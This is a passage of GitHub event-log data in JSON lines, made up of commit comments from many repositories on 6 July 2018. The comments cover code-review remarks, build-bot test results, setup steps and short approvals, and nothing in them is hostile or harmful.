<https://github.com/notifications/unsubscribe-auth/AAojHfcWWC-Ald90RDFraR5R7rOxb0KBks5uD2bvgaJpZM4VFdIN>.\n>> \n> \n\n"}},"created_at":"2018-07-06T13:36:10Z"}
{"id":"7928970191","type":"CommitCommentEvent","actor":{"login":"jhealerbb"},"repo":{"name":"lamto20132223/Elevator-In-Java"},"payload":{"comment":{"id":29621643,"position":null,"line":null,"path":null,"commit_id":"50db0962a633ea697f4180b417b5f4907f16d013","created_at":"2018-07-06T13:36:46Z","updated_at":"2018-07-06T13:36:46Z","author_association":"NONE","body":"Hello, i have problem with this line in SpriteHorizontal file \r\n BufferedImage spriteSheet = ImageIO\r\n\t\t\t\t.read(new File(DemoElevator.getCurrentDirectory() + \"C:\\\\Users\\\\user\\\\Desktop\\\\image\" + namePicture));\r\n\r\n"}},"created_at":"2018-07-06T13:36:46Z"}
{"id":"7928978428","type":"CommitCommentEvent","actor":{"login":"jakebolewski"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29621659,"position":73,"line":73,"path":"doc/source/tutorials/concurrency-consistency.rst","commit_id":"b1ae69ae47155097b56b657093a4eebf2769e62b","created_at":"2018-07-06T13:38:22Z","updated_at":"2018-07-06T13:38:22Z","author_association":"MEMBER","body":"remove \"at all\""}},"created_at":"2018-07-06T13:38:22Z"}
{"id":"7928980398","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29621664,"position":29,"line":1228,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T13:38:44Z","updated_at":"2018-07-06T13:38:44Z","author_association":"OWNER","body":"By loop I mean the loop in xbd_connect(), from where the load was called. Earlier, if the allocation of grant refs failed, break was called.\r\n\r\nOk, I'll set sc->xbd_max_request_indirectpages = 0."}},"created_at":"2018-07-06T13:38:44Z"}
{"id":"7928988281","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":29621679,"position":null,"line":null,"path":null,"commit_id":"2eb11a1c9744d514cc3c84c742b46197eccdba40","created_at":"2018-07-06T13:40:14Z","updated_at":"2018-07-06T13:40:14Z","author_association":"MEMBER","body":"@Aaron1011 \r\n\r\nThis isn't solely caused by mods. For example, if you have a WorldGenerator that places lots of Sponges (think as common as grass) it'll hit this issue."}},"created_at":"2018-07-06T13:40:14Z"}
{"id":"7928993293","type":"CommitCommentEvent","actor":{"login":"MrClumsy"},"repo":{"name":"sammchardy/python-kucoin"},"payload":{"comment":{"id":29621685,"position":null,"line":null,"path":null,"commit_id":"7c25bd8717f3c298ceb3d66e5b9349f70342d4d1","created_at":"2018-07-06T13:41:11Z","updated_at":"2018-07-06T13:41:11Z","author_association":"NONE","body":"Hi Sam, thank you for sharing you all of this great work. Quick question for you though... is there currently not a way to do a market buy order from the kucoin API? I have looked through their documentation and do not see anything on it and thought maybe you would know. I understand that we can essentially create our own market buy order by updating prices but I am just curious if they facilitate a market buy like Binance to make the process streamlined and more effecient? "}},"created_at":"2018-07-06T13:41:11Z"}
{"id":"7929002028","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29621705,"position":null,"line":null,"path":null,"commit_id":"c2c4c4b5647a11057cd6eb8891fd2cd1c9e2a234","created_at":"2018-07-06T13:42:50Z","updated_at":"2018-07-06T13:42:50Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-6-d8train.pantheonsite.io/)\n\nCreated multidev environment [pr-6](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#pr-6) for d8train."}},"created_at":"2018-07-06T13:42:50Z"}
{"id":"7929002644","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29621706,"position":null,"line":null,"path":null,"commit_id":"a5d565d94ac2d248eb7f4b9d81ca49561c2753ef","created_at":"2018-07-06T13:42:56Z","updated_at":"2018-07-06T13:42:56Z","author_association":"COLLABORATOR","body":"Reasoning for change can be found in JacquesCarette/Drasil/issues/740"}},"created_at":"2018-07-06T13:42:56Z"}
{"id":"7929002856","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29621708,"position":5,"line":33,"path":"python/py-nose/Portfile","commit_id":"142d000586d1520e70af59ff39b2d5f4e0de3bae","created_at":"2018-07-06T13:42:59Z","updated_at":"2018-07-06T13:42:59Z","author_association":"MEMBER","body":"We should probably be removing support for 2.6 and 3.3."}},"created_at":"2018-07-06T13:42:59Z"}
{"id":"7929004301","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29621709,"position":5,"line":56,"path":"require.js","commit_id":"724fd6617abbbbf6ac2b859cfb2aaf5afb5062e1","created_at":"2018-07-06T13:43:14Z","updated_at":"2018-07-06T13:43:14Z","author_association":"NONE","body":"You need to use the store the href instead of relying on responseURL.\r\nThis property was the latest added to XMLHttpRequest, I wouldn't depend on it.\r\n\r\nhttps://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/responseURL#Browser_compatibility"}},"created_at":"2018-07-06T13:43:14Z"}
{"id":"7929004907","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29621711,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T13:43:21Z","updated_at":"2018-07-06T13:43:21Z","author_association":"NONE","body":"158868652_Issue#5821 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T13:43:21Z"}
{"id":"7929008539","type":"CommitCommentEvent","actor":{"login":"benawad"},"repo":{"name":"benawad/fullstack-graphql-airbnb-clone"},"payload":{"comment":{"id":29621719,"position":19,"line":26,"path":"packages/controller/package.json","commit_id":"5b1b90852f9c4ed996f580ff684050c2ba835afb","created_at":"2018-07-06T13:44:01Z","updated_at":"2018-07-06T13:44:01Z","author_association":"OWNER","body":"yeah we don't need it anymore we can remove it."}},"created_at":"2018-07-06T13:44:01Z"}
{"id":"7929010463","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29621725,"position":null,"line":null,"path":null,"commit_id":"964c889566207fe73df84dff8b149bfaf1ccb4cc","created_at":"2018-07-06T13:44:24Z","updated_at":"2018-07-06T13:44:24Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-738](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-738).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-738-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-06T13:44:24Z"}
{"id":"7929011485","type":"CommitCommentEvent","actor":{"login":"off99555"},"repo":{"name":"exodrifter/unity-python"},"payload":{"comment":{"id":29621728,"position":null,"line":null,"path":null,"commit_id":"f864edb51f2a4f8c5ae2cf77e2c28df540bd6f37","created_at":"2018-07-06T13:44:36Z","updated_at":"2018-07-06T13:44:36Z","author_association":"NONE","body":"I mean `UnityPython.cs`. But you have already answered that it's about calling Unity API inside python."}},"created_at":"2018-07-06T13:44:36Z"}
{"id":"7929013162","type":"CommitCommentEvent","actor":{"login":"fzieris"},"repo":{"name":"saros-project/saros"},"payload":{"comment":{"id":29621734,"position":28,"line":320,"path":"de.fu_berlin.inf.dpp.core/src/de/fu_berlin/inf/dpp/negotiation/IncomingSessionNegotiation.java","commit_id":"df722bfef6409c19887ecb0289f94c5d25731be8","created_at":"2018-07-06T13:44:54Z","updated_at":"2018-07-06T13:44:54Z","author_association":"MEMBER","body":"@Drakulix see https://sonarcloud.io/project/issues?id=saros_complete&issues=AWRr9fOzMt9UOhrwDcCe&open=AWRr9fOzMt9UOhrwDcCe, this skip is not helpful anymore."}},"created_at":"2018-07-06T13:44:54Z"}
{"id":"7929014137","type":"CommitCommentEvent","actor":{"login":"kisielk"},"repo":{"name":"kisielk/errcheck"},"payload":{"comment":{"id":29621744,"position":31,"line":135,"path":"internal/errcheck/errcheck.go","commit_id":"4ad83318240dac4ff9011ae6c1ac62336516382e","created_at":"2018-07-06T13:45:07Z","updated_at":"2018-07-06T13:45:07Z","author_association":"OWNER","body":"There’s lots of cases where those need the error return checked, when the writer is a file or network connection for example. \n\n> On Jul 6, 2018, at 05:35, Uwe Dauernheim <notifications@github.com> wrote:\n> \n> @kisielk Any specific reason to not also exclude fmt.Fprint, fmt.Fprintf and fmt.Fprintln?\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-06T13:45:07Z"}
{"id":"7929020752","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kgh475926/slack-like-app"},"payload":{"comment":{"id":29621757,"position":null,"line":null,"path":null,"commit_id":"74e8c766d90711bfe4b053dd491b8f9843838cfa","created_at":"2018-07-06T13:46:19Z","updated_at":"2018-07-06T13:46:19Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T13:46:19Z"}
{"id":"7929021383","type":"CommitCommentEvent","actor":{"login":"RKJO"},"repo":{"name":"RKJO/room_app"},"payload":{"comment":{"id":29621761,"position":71,"line":243,"path":"room_service/room_rents/views.py","commit_id":"f21b83478171763bd92a5f97eba15519cb400cfb","created_at":"2018-07-06T13:46:27Z","updated_at":"2018-07-06T13:46:27Z","author_association":"OWNER","body":"@andrzej3393 cały czas wywala mi błąd  'QuerySet' object has no attribute 'reservation' nie wiem w czym błąd... jak dodać tu rezerwację\r\n\r\n"}},"created_at":"2018-07-06T13:46:27Z"}
{"id":"7929023069","type":"CommitCommentEvent","actor":{"login":"dvdcastro"},"repo":{"name":"moodlerooms/moodle-tool_ally"},"payload":{"comment":{"id":29621774,"position":12,"line":134,"path":"classes/local_content.php","commit_id":"055567ab0c74dd156ee26f5bd328b466b435292c","created_at":"2018-07-06T13:46:48Z","updated_at":"2018-07-06T13:46:48Z","author_association":"CONTRIBUTOR","body":"I think they should from what you have put here and in the other comments. Thanks for the heads up!"}},"created_at":"2018-07-06T13:46:48Z"}
{"id":"7929025577","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kgh475926/slack-like-app"},"payload":{"comment":{"id":29621777,"position":null,"line":null,"path":null,"commit_id":"5657361f6cdc4bfc7de99d60bb961b28036365fc","created_at":"2018-07-06T13:47:17Z","updated_at":"2018-07-06T13:47:17Z","author_association":"NONE","body":"This commit message is a bit misleading. Try to be more specific so it's easier to reference in the future. Otherwise, good work. 👍 "}},"created_at":"2018-07-06T13:47:17Z"}
{"id":"7929027029","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kgh475926/slack-like-app"},"payload":{"comment":{"id":29621782,"position":null,"line":null,"path":null,"commit_id":"3bde7e25fd451c1268cb012386a0882717237236","created_at":"2018-07-06T13:47:33Z","updated_at":"2018-07-06T13:47:33Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T13:47:33Z"}
{"id":"7929027945","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kgh475926/slack-like-app"},"payload":{"comment":{"id":29621783,"position":null,"line":null,"path":null,"commit_id":"6d0cba42342eb450d4f30a7cb29e484af0b1ca00","created_at":"2018-07-06T13:47:43Z","updated_at":"2018-07-06T13:47:43Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T13:47:43Z"}
{"id":"7929028182","type":"CommitCommentEvent","actor":{"login":"SopheakSem"},"repo":{"name":"SopheakSem/Laravel-5.4-Student-Management-System"},"payload":{"comment":{"id":29621784,"position":null,"line":null,"path":null,"commit_id":"f93a226d351baca97fd2c5b6705f0ab1c76deaa2","created_at":"2018-07-06T13:47:47Z","updated_at":"2018-07-06T13:47:47Z","author_association":"OWNER","body":"\r\n1.     Create .env file using this command (copy .env.example .env)\r\n2.     Run command (php artisan key:generate)\r\n"}},"created_at":"2018-07-06T13:47:47Z"}
{"id":"7929028236","type":"CommitCommentEvent","actor":{"login":"off99555"},"repo":{"name":"exodrifter/unity-python"},"payload":{"comment":{"id":29621785,"position":11,"line":11,"path":"Scripts/UnityPython.cs","commit_id":"f864edb51f2a4f8c5ae2cf77e2c28df540bd6f37","created_at":"2018-07-06T13:47:48Z","updated_at":"2018-07-06T13:47:48Z","author_association":"NONE","body":"So if we don't load the assembly then we wouldn't be able to call Unity API inside python?\r\nI don't see this class is referenced by any of the example scripts so I'm wondering if it's just an unused class?"}},"created_at":"2018-07-06T13:47:48Z"}
{"id":"7929028449","type":"CommitCommentEvent","actor":{"login":"gferna"},"repo":{"name":"gferna/deploys"},"payload":{"comment":{"id":29621786,"position":null,"line":null,"path":null,"commit_id":"9d5d6ead3989bb7274a842d33815be8a453799e8","created_at":"2018-07-06T13:47:50Z","updated_at":"2018-07-06T13:47:50Z","author_association":"OWNER","body":"Muy bien, así no habrá despistados, ahora queda mucho mejor."}},"created_at":"2018-07-06T13:47:50Z"}
{"id":"7929034563","type":"CommitCommentEvent","actor":{"login":"RKJO"},"repo":{"name":"RKJO/room_app"},"payload":{"comment":{"id":29621801,"position":31,"line":70,"path":"room_service/room_rents/views.py","commit_id":"f21b83478171763bd92a5f97eba15519cb400cfb","created_at":"2018-07-06T13:48:59Z","updated_at":"2018-07-06T13:48:59Z","author_association":"OWNER","body":"@andrzej3393 i jak to dobrze wyswietlić bo narazie pokazuje sie w tabeli ale w taki sposób \r\n\r\n> [datetime.datetime(2018, 7, 20, 0, 0, tzinfo=), datetime.datetime(2018, 8, 1, 0, 0, tzinfo=), datetime.datetime(2018, 8, 2, 0, 0, tzinfo=)]\r\n--\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-06T13:48:59Z"}
{"id":"7929043104","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29621816,"position":18,"line":86,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T13:50:37Z","updated_at":"2018-07-06T13:50:37Z","author_association":"NONE","body":"`timeout` wasn't well supported: I would use `setTimeout` as a fallback.\r\n\r\nhttps://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/timeout#Browser_compatibility"}},"created_at":"2018-07-06T13:50:37Z"}
{"id":"7929045446","type":"CommitCommentEvent","actor":{"login":"kaushalmodi"},"repo":{"name":"gohugoio/hugo"},"payload":{"comment":{"id":29621818,"position":34,"line":278,"path":"hugolib/page.go","commit_id":"dea71670c059ab4d5a42bd22503f18c087dd22d4","created_at":"2018-07-06T13:51:01Z","updated_at":"2018-07-06T13:51:01Z","author_association":"CONTRIBUTOR","body":"Minor note: Can you please fix this typo: lenght -> length. \r\n\r\nSuper excited to try this out when I get to a computer in 2 days!"}},"created_at":"2018-07-06T13:51:01Z"}
{"id":"7929053660","type":"CommitCommentEvent","actor":{"login":"CounterOP"},"repo":{"name":"CounterOP/CounterOP.github.io"},"payload":{"comment":{"id":29621829,"position":null,"line":null,"path":null,"commit_id":"8272dae98566b67ae9304f50ec05114ab93f0ea4","created_at":"2018-07-06T13:52:32Z","updated_at":"2018-07-06T13:52:32Z","author_association":"OWNER","body":"revert"}},"created_at":"2018-07-06T13:52:32Z"}
{"id":"7929059855","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29621844,"position":26,"line":106,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T13:53:42Z","updated_at":"2018-07-06T13:53:42Z","author_association":"NONE","body":"IE requires this line to be placed after `open` and before `send`."}},"created_at":"2018-07-06T13:53:42Z"}
{"id":"7929063239","type":"CommitCommentEvent","actor":{"login":"kekkokk"},"repo":{"name":"lynckia/licode"},"payload":{"comment":{"id":29621853,"position":null,"line":null,"path":null,"commit_id":"24c955a07029bdd503aae36b9988c2d0ac663a5a","created_at":"2018-07-06T13:54:20Z","updated_at":"2018-07-06T13:54:20Z","author_association":"CONTRIBUTOR","body":"How did you tested h264 simulcast???"}},"created_at":"2018-07-06T13:54:20Z"}
{"id":"7929065324","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29621857,"position":null,"line":null,"path":null,"commit_id":"f9866fd7277181919e30fd17e6366d6225277a32","created_at":"2018-07-06T13:54:45Z","updated_at":"2018-07-06T13:54:45Z","author_association":"COLLABORATOR","body":"Puzzle `389-3679238e` discovered in   [`shopelectro/management/commands/test_db.py`](  https://github.com/fidals/shopelectro/blob/master/shopelectro/management/commands/test_db.py)   and submitted as #404. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-06T13:54:45Z"}
{"id":"7929066324","type":"CommitCommentEvent","actor":{"login":"Mikanbu"},"repo":{"name":"Mikanbu/VLCMediaLibraryKit"},"payload":{"comment":{"id":29621859,"position":null,"line":null,"path":null,"commit_id":"0cf0232d5835da56be3016351e2b264d061c0d86","created_at":"2018-07-06T13:54:56Z","updated_at":"2018-07-06T13:54:56Z","author_association":"OWNER","body":"This will always fail if the user didn't call `files` since `_files` wouldn't have been initialized.\r\nWould a simple be the right solution? 🤔 \r\n```\r\n    if (!_files) {\r\n        [self files];\r\n    }\r\n```\r\n"}},"created_at":"2018-07-06T13:54:56Z"}
{"id":"7929066373","type":"CommitCommentEvent","actor":{"login":"williamstein"},"repo":{"name":"sagemathinc/cocalc"},"payload":{"comment":{"id":29621860,"position":null,"line":null,"path":null,"commit_id":"79e1cb6fe3e87ea7805c3cd5c8a75e683c9b156d","created_at":"2018-07-06T13:54:57Z","updated_at":"2018-07-06T13:54:57Z","author_association":"CONTRIBUTOR","body":"Thanks!"}},"created_at":"2018-07-06T13:54:57Z"}
{"id":"7929069119","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29621866,"position":76,"line":85,"path":"require.js","commit_id":"7c02c3144e2afecd6474a314fc0bb4861627b713","created_at":"2018-07-06T13:55:28Z","updated_at":"2018-07-06T13:55:28Z","author_association":"NONE","body":"`getRequestHeader` must be placed after `open` and before `send`."}},"created_at":"2018-07-06T13:55:28Z"}
{"id":"7929069885","type":"CommitCommentEvent","actor":{"login":"Broxzier"},"repo":{"name":"OpenRCT2/objects"},"payload":{"comment":{"id":29621867,"position":5,"line":6,"path":"objects/rct2/ride/rct2.amt1.json","commit_id":"cd9b87b0ab6b09723d72cdd1e6f8cab352300dcf","created_at":"2018-07-06T13:55:36Z","updated_at":"2018-07-06T13:55:36Z","author_association":"MEMBER","body":"I don't remember RCT1 having ATMs."}},"created_at":"2018-07-06T13:55:36Z"}
{"id":"7929073372","type":"CommitCommentEvent","actor":{"login":"leonziger"},"repo":{"name":"leonziger/ayu-dag"},"payload":{"comment":{"id":29621873,"position":6,"line":24,"path":"src/components/button/button.scss","commit_id":"5f559a2e5a341010f26d65bf181fd8520d42dbde","created_at":"2018-07-06T13:56:16Z","updated_at":"2018-07-06T13:56:16Z","author_association":"OWNER","body":"то есть делать отступ справа тексту, который слева от кнопки?"}},"created_at":"2018-07-06T13:56:16Z"}
{"id":"7929073650","type":"CommitCommentEvent","actor":{"login":"akalinow"},"repo":{"name":"akalinow/Production"},"payload":{"comment":{"id":29621875,"position":null,"line":null,"path":null,"commit_id":"c7abadccf2af2cd429ae6fd74675b87bd18279b3","created_at":"2018-07-06T13:56:20Z","updated_at":"2018-07-06T13:56:20Z","author_association":"OWNER","body":"@mbluj @rukito FYI"}},"created_at":"2018-07-06T13:56:20Z"}
{"id":"7929079508","type":"CommitCommentEvent","actor":{"login":"StachuDotNet"},"repo":{"name":"Zaid-Ajaj/Fable.Remoting"},"payload":{"comment":{"id":29621891,"position":null,"line":null,"path":null,"commit_id":"266519ac009b73edfbca142895968da9fd358ccd","created_at":"2018-07-06T13:57:26Z","updated_at":"2018-07-06T13:57:26Z","author_association":"NONE","body":"So pretty :)"}},"created_at":"2018-07-06T13:57:26Z"}
{"id":"7929080969","type":"CommitCommentEvent","actor":{"login":"akalinow"},"repo":{"name":"akalinow/LLRHiggsTauTau"},"payload":{"comment":{"id":29621895,"position":null,"line":null,"path":null,"commit_id":"716c4e6f4fcf582962ddd26ba9a2fd766c965136","created_at":"2018-07-06T13:57:42Z","updated_at":"2018-07-06T13:57:42Z","author_association":"OWNER","body":"@mbluj @rukito FYI (there were some commits later for README file only)"}},"created_at":"2018-07-06T13:57:42Z"}
{"id":"7929091576","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29621913,"position":null,"line":null,"path":null,"commit_id":"072c94e3b16fe8181c7824e26b790d033ba85dd7","created_at":"2018-07-06T13:59:43Z","updated_at":"2018-07-06T13:59:43Z","author_association":"NONE","body":"You rocks!"}},"created_at":"2018-07-06T13:59:43Z"}
{"id":"7929093685","type":"CommitCommentEvent","actor":{"login":"verbart"},"repo":{"name":"leonziger/ayu-dag"},"payload":{"comment":{"id":29621919,"position":6,"line":24,"path":"src/components/button/button.scss","commit_id":"5f559a2e5a341010f26d65bf181fd8520d42dbde","created_at":"2018-07-06T14:00:08Z","updated_at":"2018-07-06T14:00:08Z","author_association":"CONTRIBUTOR","body":"всё нормально, тут не весь код видно, показалось это для .button задан был стиль, для иконки норм"}},"created_at":"2018-07-06T14:00:08Z"}
{"id":"7929101240","type":"CommitCommentEvent","actor":{"login":"healfy"},"repo":{"name":"healfy/PythonCourses"},"payload":{"comment":{"id":29621944,"position":null,"line":null,"path":null,"commit_id":"806444c5559a72cafdd0d2bb292bcf2f35018dab","created_at":"2018-07-06T14:01:27Z","updated_at":"2018-07-06T14:01:27Z","author_association":"OWNER","body":"Editing function for unittest"}},"created_at":"2018-07-06T14:01:27Z"}
{"id":"7929104230","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29621952,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-06T14:01:58Z","updated_at":"2018-07-06T14:01:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T14:01:58Z"}
{"id":"7929104238","type":"CommitCommentEvent","actor":{"login":"mohammadnawazsharief"},"repo":{"name":"mohammadnawazsharief/test"},"payload":{"comment":{"id":29621953,"position":3,"line":4,"path":"index.html","commit_id":"bc22a2c958543622836d65a9de65dc250f9e7b3e","created_at":"2018-07-06T14:01:58Z","updated_at":"2018-07-06T14:01:58Z","author_association":"OWNER","body":"what the hell is this"}},"created_at":"2018-07-06T14:01:58Z"}
{"id":"7929105554","type":"CommitCommentEvent","actor":{"login":"playduck"},"repo":{"name":"StereoBeast/Project0815"},"payload":{"comment":{"id":29621959,"position":4,"line":17,"path":"src/main/Launcher.java","commit_id":"505c894f6aaeaaf09182017db3e5342973202109","created_at":"2018-07-06T14:02:13Z","updated_at":"2018-07-06T14:02:13Z","author_association":"COLLABORATOR","body":"weil das das Problem mit dem Projekt war..."}},"created_at":"2018-07-06T14:02:13Z"}
{"id":"7929106955","type":"CommitCommentEvent","actor":{"login":"mohammadnawazsharief"},"repo":{"name":"mohammadnawazsharief/test"},"payload":{"comment":{"id":29621962,"position":3,"line":4,"path":"index.html","commit_id":"bc22a2c958543622836d65a9de65dc250f9e7b3e","created_at":"2018-07-06T14:02:29Z","updated_at":"2018-07-06T14:02:29Z","author_association":"OWNER","body":"Just checking bro"}},"created_at":"2018-07-06T14:02:29Z"}
{"id":"7929108750","type":"CommitCommentEvent","actor":{"login":"mohammadnawazsharief"},"repo":{"name":"mohammadnawazsharief/test"},"payload":{"comment":{"id":29621964,"position":3,"line":4,"path":"index.html","commit_id":"bc22a2c958543622836d65a9de65dc250f9e7b3e","created_at":"2018-07-06T14:02:48Z","updated_at":"2018-07-06T14:02:48Z","author_association":"OWNER","body":"And what about this"}},"created_at":"2018-07-06T14:02:48Z"}
{"id":"7929109177","type":"CommitCommentEvent","actor":{"login":"nathangibson"},"repo":{"name":"biblia-arabica/biblia-arabica-data"},"payload":{"comment":{"id":29621965,"position":null,"line":null,"path":null,"commit_id":"c618bcc455f1c39241af3c726463317db9be976b","created_at":"2018-07-06T14:02:52Z","updated_at":"2018-07-06T14:02:52Z","author_association":"CONTRIBUTOR","body":"@wsalesky Running a new transform from scratch using the \"Initiate\" button has deleted a bunch of respStmt which were autogenerated from the \"lastModifiedByUser\" field in Zotero. See e.g., 2V663H7E.xml. It has also replaced some editors with more recent ones (as expected), e.g., 35N5M6I6.xml. \r\n\r\nI believe the reason it deleted these is that it appears Zotero only includes lastModifiedByUser if that user is different from the creator. So if I created the record, someone else modified it, and I did some final tweaking (a common scenario), it doesn't list anyone as modifying it. \r\n\r\nSo far that is a problem with Zotero. But that raises a question regarding the \"Initiate\" and \"Update\" buttons. If I use \"Update\", will it still delete these respStmt? In other words, would that be a good way to keep the changelog?"}},"created_at":"2018-07-06T14:02:52Z"}
{"id":"7929113473","type":"CommitCommentEvent","actor":{"login":"mohammadnawazsharief"},"repo":{"name":"mohammadnawazsharief/test"},"payload":{"comment":{"id":29621974,"position":5,"line":6,"path":"index.html","commit_id":"bc22a2c958543622836d65a9de65dc250f9e7b3e","created_at":"2018-07-06T14:03:38Z","updated_at":"2018-07-06T14:03:38Z","author_association":"OWNER","body":"Thank you"}},"created_at":"2018-07-06T14:03:38Z"}
{"id":"7929116480","type":"CommitCommentEvent","actor":{"login":"frenck"},"repo":{"name":"dynverse/dynwrap"},"payload":{"comment":{"id":29621981,"position":null,"line":null,"path":null,"commit_id":"01c484fbd320b7479173147290bb70f20baab30c","created_at":"2018-07-06T14:04:12Z","updated_at":"2018-07-06T14:04:12Z","author_association":"NONE","body":"LOL! You've downvotes my answer... but nevertheless, are implementing it.\r\n![bitmoji](https://render.bitstrips.com/v2/cpanel/d340a122-e875-4131-839a-c0785401609c-82100c49-8c0a-4ae4-9b04-3a6d3eac9cc2-v1.png?transparent=1&palette=1&width=246)"}},"created_at":"2018-07-06T14:04:12Z"}
{"id":"7929123862","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29622014,"position":null,"line":null,"path":null,"commit_id":"11d3f513e2a6a287e09cdfe45b565de82d6ebe17","created_at":"2018-07-06T14:05:39Z","updated_at":"2018-07-06T14:05:39Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-06T14:05:39Z"}
